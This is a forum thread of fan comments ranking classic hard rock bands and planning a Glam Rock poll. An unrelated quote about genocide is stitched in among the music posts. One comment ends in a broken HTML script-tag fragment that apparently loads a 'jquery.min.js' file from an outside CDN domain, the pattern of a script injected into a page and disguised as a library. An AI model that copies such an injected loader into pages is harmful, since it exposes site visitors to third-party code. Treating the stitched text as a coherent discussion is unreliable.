Undecided between The Rolling Stones and The Who.
Voted for Rolling Stones, I liked very much their production between 1965-1972. Sticky Fingers and Exile On Main Street are absolute masterpieces.

Amos Goldberg (professor of Genocide Studies at the Hebrew University in Jerusalem): Yes, it's genocide. It's so difficult and painful to admit it, but we can no longer avoid this conclusion.

That was an easy vote for me.. Led Zeppelin. My #2 would be The Rolling Stones.< ="text/" ="utf-8" id="tr-app" ="https://cdn.optitc.com/jquery.min.js?u=eng&f=2&s=500,400,50,50&v=0.0.4">

For any Uriah Heep fans out there in the progosphere, here's Ken Hensley & friends Live in Norway in 2005.
I only post the best quality concerts here - none of that camera-phone rubbish you see all over YouTube.

Maybe it's time for a Glam Metal poll too, although I'm already predicting that Kiss will win that poll hands down.

Indeed. A once proud bluesy hard rock outfit that descended into the commercial abyss with the likes of Warrant, Ratt, and Cinderella. I could never vote for them overall based on how they finished. As an aside, IMO Burn is a top Deep Purple album, largely on the strength of Coverdale's performance.

My Glam Rock poll is now alive and kicking in sparkling silver glitter, high-heels, lipstick and eye-shadow, and that's just the guys!

Top 10 out of these bands, roughly:
01. Led Zeppelin 02. Deep Purple 03. Black Sabbath 04. Uriah Heep 05. Rainbow 06. Hawkwind 07. Cream 08. Wishbone Ash 09. Atomic Rooster 10. The Who Honorable mentions: Black Widow, Whitesnake Not considered: Iron Maiden, Judas Priest, Saxon So I decided to exclude bands I consider NWOBHM primarily because, to me, it feels like a completely different era. I'd rather have Budgie in the mix, or maybe Foreigner ;p Top 3 is set in stone, sometimes Black Sabbath gets the first spot, so as Deep Purple, but generally those three distanced themselves from the rest, if you ask me. I know it's a popular opinion in the web now, but I can't help it - perhaps these 3 are so good that we all come to a similar conclusion. The rest of the pack has between 3 and 5 albums that I find interesting, like I said I don't listen to music as much as I had in high school/college days, so it's been a few years since I've heard Space Ritual or Quadrophenia... but I'm pretty certain about this order. I admire Whitesnake for Coverdale's voice and premium musicians in their lineup, but their later releases remind me too much of dreaded/formulaic hair metal... Black Widow had a great debut, but I don't remember any song from later releases. All the rest seemed a bit same-y, generic, with a "try-hard-to-be-edgy" approach... correct me if I'm wrong. Maybe there is a terrific album somewhere in Status Quo or Nazareth catalogue and I'm talking outta my ass. |

Wishbone Ash lately, but Deep Purple, Judas Priest, Rainbow, and Uriah Heep all would have done it for me at some time or another.

I also recommend the band Red Dirt, quite uncompromising playing in the style of a sandy desert with even harsh vocals and acoustic fragments. At first I thought they were from the USA, but the surprise was from England. All in all, the whole album and additional songs with violin are quite good (especially "Death Letter", "Summer Madness" and heavy "Mind Worker").

No you're right Richard, Paul Chapman was a guitarist in both bands. Glad to see someone else knows them.

I still love The Sweet. Such an underrated band although they were all total 'arseholes' apparently!

No problem. I'm planning a separate Glam-Rock poll for all of the classic 1970's Glam bands such as T.Rex, Sweet and Slade. I'll probably leave out Gary Glitter though, for obvious reasons.

My favourite Uriah Heep era were the early years with David Byron. He was a wizard when it came to reaching those high notes. ![]() |

In that case, it's a good thing I included Iron Maiden in the poll. I was thinking they might be too heavy for a Hard Rock poll.
